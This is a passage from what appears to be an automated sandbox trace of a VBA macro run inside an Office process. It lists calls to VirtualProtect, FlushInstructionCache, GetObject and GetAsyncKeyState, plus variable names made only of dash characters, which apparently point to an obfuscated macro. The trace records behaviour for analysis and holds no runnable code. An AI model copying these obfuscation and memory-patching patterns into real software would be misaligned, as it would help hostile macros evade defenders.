| out: lpWideCharStr="—–—–––——————––—–—————–———––––") returned 30 [0101.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302e7e, cbMultiByte=30, lpWideCharStr=0x197704, cchWideChar=31 | out: lpWideCharStr="—–—–––——————––—–—————–———––––") returned 30 [0101.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302e7e, cbMultiByte=30, lpWideCharStr=0x197704, cchWideChar=31 | out: lpWideCharStr="—–—–––——————––—–—————–———––––") returned 30 [0101.372] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x96\x97\x96\x96\x96\x96\x96\x96\x97\x96\x97\x96\x97\x97\x96\x97\x97\x96\x96\x97\x97\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="\x97\x96\x97\x96\x96\x96\x97\x97\x97\x97\x97\x97\x96\x96\x97\x96\x97\x97\x97\x97\x97\x96\x97\x97\x97\x96\x96\x96\x96", cchCount2=-1) returned 3 [0101.372] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x96\x97\x96\x97\x97\x97\x96\x97\x97\x96\x96\x96\x96\x96\x96\x96\x97\x96\x96\x97\x96\x96\x96\x97\x96\x96\x97", cchCount1=-1, lpString2="\x97\x96\x97\x96\x96\x96\x97\x97\x97\x97\x97\x97\x96\x96\x97\x96\x97\x97\x97\x97\x97\x96\x97\x97\x97\x96\x96\x96\x96", cchCount2=-1) returned 1 [0101.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302e7e, cbMultiByte=30, lpWideCharStr=0x197704, cchWideChar=31 | out: lpWideCharStr="—–—–––——————––—–—————–———––––") returned 30 [0101.373] CRetailMalloc_Alloc () returned 0xc98b970 [0101.373] _mbscpy_s (in: _Dst=0xc98b970, _DstSizeInBytes=0x1e, _Src=0x11302e7e | out: _Dst=0xc98b970) returned 0x0 [0101.373] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="_B_var_\x96\x97\x96\x97\x96\x97\x97\x97\x96\x97\x97\x96\x96\x96\x96\x96\x96\x96\x97\x96\x96\x97\x96\x96\x96\x97\x96\x96\x97", cchCount1=-1, lpString2="_B_var_\x97\x96\x97\x96\x96\x96\x97\x97\x97\x97\x97\x97\x96\x96\x97\x96\x97\x97\x97\x97\x97\x96\x97\x97\x97\x96\x96\x96\x96", cchCount2=-1) returned 1 [0101.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40c66, cbMultiByte=37, lpWideCharStr=0x197714, cchWideChar=38 | out: lpWideCharStr="_B_var_—–—–––——————––—–—————–———––––") returned 37 [0101.373] _mbscpy_s (in: _Dst=0x19777c, _DstSizeInBytes=0x1e, _Src=0x11302e7e | out: _Dst=0x19777c) returned 0x0 [0101.373] CRetailMalloc_Free () returned 0x1 [0101.373] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0101.373] memcpy (in: _Dst=0xb2a5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.373] memcpy (in: _Dst=0xb2a5168, _Src=0x1976f4, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.374] memcpy (in: _Dst=0xb2a5168, _Src=0x1976f4, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.374] memcpy (in: _Dst=0xb2a5168, _Src=0x1976f4, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.374] memcpy (in: _Dst=0xb2a5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.374] memcpy (in: _Dst=0xb2a5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6961ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0101.375] memcpy (in: _Dst=0xf4fabf0, _Src=0x197924, _Size=0x18 | out: _Dst=0xf4fabf0) returned 0xf4fabf0 [0101.375] CRetailMalloc_Realloc () returned 0xf4faad8 [0101.375] CRetailMalloc_Free () returned 0x1 [0101.375] GetCurrentProcess () returned 0xffffffff [0101.375] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0101.375] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.376] GetCurrentProcess () returned 0xffffffff [0101.376] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0101.376] GetCurrentProcess () returned 0xffffffff [0101.376] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0101.376] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.377] GetCurrentProcess () returned 0xffffffff [0101.377] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0101.377] GetCurrentProcess () returned 0xffffffff [0101.377] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0101.377] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.377] GetCurrentProcess () returned 0xffffffff [0101.377] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0101.377] GetCurrentProcess () returned 0xffffffff [0101.377] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0101.377] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.378] GetCurrentProcess () returned 0xffffffff [0101.378] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0101.378] GetCurrentProcess () returned 0xffffffff [0101.378] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0101.378] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.379] GetCurrentProcess () returned 0xffffffff [0101.379] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0101.379] GetCurrentProcess () returned 0xffffffff [0101.379] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0101.379] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.380] GetCurrentProcess () returned 0xffffffff [0101.380] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0101.380] GetCurrentProcess () returned 0xffffffff [0101.380] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0101.380] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.380] GetCurrentProcess () returned 0xffffffff [0101.380] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0101.380] GetCurrentProcess () returned 0xffffffff [0101.380] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0101.380] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.381] GetCurrentProcess () returned 0xffffffff [0101.381] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0101.381] GetCurrentProcess () returned 0xffffffff [0101.381] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0101.381] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.382] GetCurrentProcess () returned 0xffffffff [0101.382] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0101.382] GetCurrentProcess () returned 0xffffffff [0101.382] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0101.382] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.382] GetCurrentProcess () returned 0xffffffff [0101.382] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0101.382] GetCurrentProcess () returned 0xffffffff [0101.382] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0101.383] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.383] GetCurrentProcess () returned 0xffffffff [0101.383] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0101.383] GetCurrentProcess () returned 0xffffffff [0101.383] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0101.383] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.384] GetCurrentProcess () returned 0xffffffff [0101.384] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0101.384] GetCurrentProcess () returned 0xffffffff [0101.384] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0101.384] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.385] GetCurrentProcess () returned 0xffffffff [0101.385] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0101.385] GetCurrentProcess () returned 0xffffffff [0101.385] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0101.385] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.385] GetCurrentProcess () returned 0xffffffff [0101.385] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0101.385] GetCurrentProcess () returned 0xffffffff [0101.386] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0101.386] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.387] GetCurrentProcess () returned 0xffffffff [0101.387] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0101.387] GetCurrentProcess () returned 0xffffffff [0101.387] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0101.387] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.388] GetCurrentProcess () returned 0xffffffff [0101.388] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0101.388] GetCurrentProcess () returned 0xffffffff [0101.388] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0101.388] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.388] GetCurrentProcess () returned 0xffffffff [0101.388] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0101.388] GetCurrentProcess () returned 0xffffffff [0101.388] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0101.388] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.389] GetCurrentProcess () returned 0xffffffff [0101.389] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0101.389] GetCurrentProcess () returned 0xffffffff [0101.389] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0101.389] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.390] GetCurrentProcess () returned 0xffffffff [0101.390] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0101.390] GetCurrentProcess () returned 0xffffffff [0101.390] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0101.390] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.390] GetCurrentProcess () returned 0xffffffff [0101.391] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0101.391] GetCurrentProcess () returned 0xffffffff [0101.391] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0101.391] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.391] GetCurrentProcess () returned 0xffffffff [0101.391] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0101.391] GetCurrentProcess () returned 0xffffffff [0101.391] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0101.391] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.392] GetCurrentProcess () returned 0xffffffff [0101.392] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0101.392] GetCurrentProcess () returned 0xffffffff [0101.392] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0101.392] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.393] GetCurrentProcess () returned 0xffffffff [0101.393] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0101.393] GetCurrentProcess () returned 0xffffffff [0101.393] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0101.393] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.393] GetCurrentProcess () returned 0xffffffff [0101.393] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0101.393] GetCurrentProcess () returned 0xffffffff [0101.393] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0101.393] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.394] GetCurrentProcess () returned 0xffffffff [0101.394] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0101.394] GetCurrentProcess () returned 0xffffffff [0101.394] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0101.394] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.395] GetCurrentProcess () returned 0xffffffff [0101.395] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0101.395] GetCurrentProcess () returned 0xffffffff [0101.395] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0101.395] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.395] GetCurrentProcess () returned 0xffffffff [0101.395] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0101.395] GetCurrentProcess () returned 0xffffffff [0101.396] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0101.396] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.396] GetCurrentProcess () returned 0xffffffff [0101.396] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0101.396] GetCurrentProcess () returned 0xffffffff [0101.396] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0101.396] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.397] GetCurrentProcess () returned 0xffffffff [0101.397] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0101.397] GetCurrentProcess () returned 0xffffffff [0101.397] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0101.397] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.398] GetCurrentProcess () returned 0xffffffff [0101.398] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0101.398] GetCurrentProcess () returned 0xffffffff [0101.398] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0101.398] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0101.398] GetCurrentProcess () returned 0xffffffff [0101.398] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0101.399] GetAsyncKeyState (vKey=3) returned 0 [0101.400] VarCmp (pvarLeft=0x197d34, pvarRight=0x197d24, lcid=0x0, dwFlags=0x30001) returned 0x2 [0101.400] VarCmp (pvarLeft=0x197d34, pvarRight=0x197d24, lcid=0x0, dwFlags=0x30001) returned 0x2 [0101.400] VarCmp (pvarLeft=0x197d34, pvarRight=0x197d24, lcid=0x0, dwFlags=0x30001) returned 0x2 [0101.400] VarCmp (pvarLeft=0x197d34, pvarRight=0x197d24, lcid=0x0, dwFlags=0x30001) returned 0x1 [0101.401] CRetailMalloc_Alloc () returned 0xf4fac68 [0101.401] memcpy (in: _Dst=0xb2a5168, _Src=0x197468, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.401] memcpy (in: _Dst=0xb2a5270, _Src=0x197484, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0101.401] memcpy (in: _Dst=0xb2a5168, _Src=0x197468, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a82eea, cbMultiByte=10, lpWideCharStr=0x197284, cchWideChar=11 | out: lpWideCharStr="GetObject") returned 10 [0101.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x113029e6, cbMultiByte=10, lpWideCharStr=0x1972e4, cchWideChar=11 | out: lpWideCharStr="GetObject") returned 10 [0101.419] memcpy (in: _Dst=0xb2a5168, _Src=0x1972d4, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.419] memcpy (in: _Dst=0xb2a5168, _Src=0x197468, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.419] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x96\x97\x97\x96\x96\x97\x97\x96\x97\x96\x96\x97\x96\x97\x96\x97\x96\x96\x96\x96\x96\x96\x96\x96\x96\x97\x97\x96\x96", cchCount1=-1, lpString2="\x96\x97\x97\x97\x96\x97\x97\x96\x96\x96\x96\x96\x97\x96\x96\x96\x96\x96\x96\x96\x97\x96\x96\x97\x96\x96\x97\x97\x96\x96\x97", cchCount2=-1) returned 3 [0101.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a82f12, cbMultiByte=32, lpWideCharStr=0x197284, cchWideChar=33 | out: lpWideCharStr="–———–——–––––—–––––––—––—––——––—") returned 32 [0101.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x113029aa, cbMultiByte=32, lpWideCharStr=0x1972e4, cchWideChar=33 | out: lpWideCharStr="–———–——–––––—–––––––—––—––——––—") returned 32 [0101.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x113029aa, cbMultiByte=32, lpWideCharStr=0x1972e4, cchWideChar=33 | out: lpWideCharStr="–———–——–––––—–––––––—––—––——––—") returned 32 [0101.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x113029aa, cbMultiByte=32, lpWideCharStr=0x1972e4, cchWideChar=33 | out: lpWideCharStr="–———–——–––––—–––––––—––—––——––—") returned 32 [0101.420] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x96\x97\x97\x96\x96\x97\x97\x96\x97\x96\x96\x97\x96\x97\x96\x97\x96\x96\x96\x96\x96\x96\x96\x96\x96\x97\x97\x96\x96", cchCount1=-1, lpString2="\x96\x97\x97\x97\x96\x97\x97\x96\x96\x96\x96\x96\x97\x96\x96\x96\x96\x96\x96\x96\x97\x96\x96\x97\x96\x96\x97\x97\x96\x96\x97", cchCount2=-1) returned 3 [0101.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x113029aa, cbMultiByte=32, lpWideCharStr=0x1972e4, cchWideChar=33 | out: lpWideCharStr="–———–——–––––—–––––––—––—––——––—") returned 32 [0101.421] CRetailMalloc_Alloc () returned 0xc98bc70 [0101.421] _mbscpy_s (in: _Dst=0xc98bc70, _DstSizeInBytes=0x20, _Src=0x113029aa | out: _Dst=0xc98bc70) returned 0x0 [0101.421] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="_B_var_\x97\x97\x96\x97\x97\x96\x96\x97\x97\x96\x97\x96\x96\x97\x96\x97\x96\x97\x96\x96\x96\x96\x96\x96\x96\x96\x96\x97\x97\x96\x96", cchCount1=-1, lpString2="_B_var_\x96\x97\x97\x97\x96\x97\x97\x96\x96\x96\x96\x96\x97\x96\x96\x96\x96\x96\x96\x96\x97\x96\x96\x97\x96\x96\x97\x97\x96\x96\x97", cchCount2=-1) returned 3 [0101.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40caa, cbMultiByte=39, lpWideCharStr=0x1972f4, cchWideChar=40 | out: lpWideCharStr="_B_var_–———–——–––––—–––––––—––—––——––—") returned 39 [0101.424] _mbscpy_s (in: _Dst=0x19735c, _DstSizeInBytes=0x20, _Src=0x113029aa | out: _Dst=0x19735c) returned 0x0 [0101.426] CRetailMalloc_Free () returned 0x1 [0101.426] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0101.428] memcpy (in: _Dst=0xb2a5168, _Src=0x197468, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.430] memcpy (in: _Dst=0xb2a516c, _Src=0x197468, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0101.430] memcpy (in: _Dst=0xb2a5168, _Src=0x1972d4, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.430] memcpy (in: _Dst=0xb2a5168, _Src=0x1972d4, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.431] memcpy (in: _Dst=0xb2a5168, _Src=0x197468, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.433] memcpy (in: _Dst=0xb2a5168, _Src=0x197468, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6961ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0101.435] memcpy (in: _Dst=0xf4face8, _Src=0x197504, _Size=0x18 | out: _Dst=0xf4face8) returned 0xf4face8 [0101.435] CRetailMalloc_Realloc () returned 0xf4fac68 [0101.435] CRetailMalloc_Free () returned 0x1 [0101.435] GetCurrentProcess () returned 0xffffffff [0101.435] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0101.435] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.438] GetCurrentProcess () returned 0xffffffff [0101.438] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0101.438] GetCurrentProcess () returned 0xffffffff [0101.440] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0101.440] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.442] GetCurrentProcess () returned 0xffffffff [0101.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0101.444] GetCurrentProcess () returned 0xffffffff [0101.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0101.444] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.446] GetCurrentProcess () returned 0xffffffff [0101.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0101.446] GetCurrentProcess () returned 0xffffffff [0101.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0101.446] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.447] GetCurrentProcess () returned 0xffffffff [0101.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0101.447] GetCurrentProcess () returned 0xffffffff [0101.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0101.447] VirtualProtect 